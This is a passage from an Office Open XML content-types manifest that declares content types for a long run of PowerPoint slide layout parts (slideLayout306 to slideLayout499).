  <Override PartName="/ppt/slideLayouts/slideLayout306.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout307.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout308.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout309.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout310.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout311.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout312.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout313.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout314.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout315.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout316.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout317.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout318.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout319.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout320.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout321.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout322.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout323.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout324.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout325.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout326.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout327.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout328.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout329.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout330.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout331.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout332.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout333.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout334.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout335.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout336.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout337.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout338.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout339.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout34.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout340.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout341.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout342.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout343.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout344.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout345.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout346.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout347.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout348.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout349.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout350.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout351.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout352.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout353.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout354.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout355.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout356.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout357.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout358.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout359.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout360.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout361.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout362.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout363.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout364.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout365.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout366.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout367.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout368.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout369.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout37.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout370.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout371.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout372.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout373.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout374.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout375.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout376.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout377.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout378.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout379.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout380.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout381.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout382.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout383.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout384.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout385.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout386.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout387.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout388.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout389.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout390.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout391.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout392.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout393.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout394.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout395.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout396.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout397.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout398.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout399.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout40.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout400.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout401.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout402.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout403.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout404.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout405.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout406.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout407.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout408.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout409.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout41.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout410.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout411.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout412.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout413.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout414.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout415.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout416.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout417.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout418.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout419.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout42.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout420.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout421.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout422.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout423.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout424.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout425.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout426.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout427.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout428.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout429.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout43.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout430.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout431.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout432.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout433.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout434.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout435.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout436.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout437.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout438.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout439.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout44.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout440.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout441.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout442.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout443.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout444.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout445.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout446.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout447.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout448.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout449.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout45.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout450.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout451.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout452.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout453.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout454.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout455.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout456.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout457.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout458.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout459.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout46.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout460.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout461.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout462.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout463.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout464.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout465.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout466.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout467.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout468.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout469.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout47.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout470.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout471.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout472.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout473.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout474.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout475.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout476.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout477.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout478.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout479.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout480.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout481.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout482.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout483.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout484.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout485.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout486.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout487.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout488.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout489.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout490.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout491.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout492.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout493.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout494.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout495.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout496.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout497.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout498.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout499.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
